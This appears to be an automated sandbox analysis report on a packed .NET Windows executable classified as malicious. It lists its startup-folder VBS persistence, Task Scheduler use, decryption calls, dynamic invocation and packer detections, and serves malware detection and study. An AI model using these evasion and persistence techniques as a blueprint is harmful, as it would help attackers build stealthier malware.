Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4kvideodownloaderplus.exe.0.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.45d89e0.1.raw.unpack, PublisherLocator.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.45d89e0.1.raw.unpack, VerifierUser.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.45d89e0.1.raw.unpack, VerifierUser.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.expl.evad.winEXE@4/3@1/1

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:64:WilError_03
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Mutant created: NULL

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\42005806-8a72-42eb-84fc-e635717951dd

Jump to behavior

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File read: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process created: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 1168
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Process created: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb]D source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb{ source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913820208.0000000005660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbP source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbk source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913820208.0000000005660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbhK5 source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.45d89e0.1.raw.unpack, VerifierUser.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.41b5460.3.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 4.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4115440.4.raw.unpack, kUBw49fxH8VSHvF6bmP.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6450000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.4488d60.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6520000.5.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6520000.5.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6520000.5.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6520000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6520000.5.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6320000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1983217284.0000000006320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 8060, type: MEMORYSTR

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D598B push ss; retf	0_2_015D5991
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D5541 pushad ; iretd	0_2_015D5547
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D2CD1 push dword ptr [ebp-17000000h]; iretd	0_2_015D2CD7
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06204240 push esp; retf	0_2_06204241
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631DE35 push esi; iretd	0_2_0631DE3D
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631DF7F push es; retf	0_2_0631DF80
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631BF85 push cs; ret	0_2_0631BF8C
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06312C67 push es; ret	0_2_06312C68
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631DDBD push es; ret	0_2_0631DDCC
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E8C19 push es; retf	0_2_063E8C54
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063ECD62 push es; iretd	0_2_063ECD68
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063ECD96 push ecx; ret	0_2_063ECD9D
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063EDBB0 push es; ret	0_2_063EDBF0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_066F6907 push ecx; retf	0_2_066F690C
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA6172 push edx; iretd	4_2_02CA6173

